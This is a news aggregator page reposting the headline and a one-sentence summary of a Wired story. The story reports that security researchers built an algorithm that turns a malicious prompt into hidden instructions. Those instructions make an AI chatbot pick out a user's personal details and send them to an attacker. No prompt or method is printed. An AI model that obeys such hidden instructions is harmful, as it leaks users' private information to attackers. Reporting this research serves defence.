MacMusic  |  PcMusic  |  440 Software  |  440 Forums  |  440TV  |  Zicos
personal
Search

This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

Thursday October 17, 2024. 12:30 PM , from Wired: Tech.
Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.
https://www.wired.com/story/ai-imprompter-malware-llm/

Related News

News copyright owned by their original publishers | Copyright © 2004 - 2024 Zicos / 440Network
Current Date
Nov, Sat 23 - 10:31 CET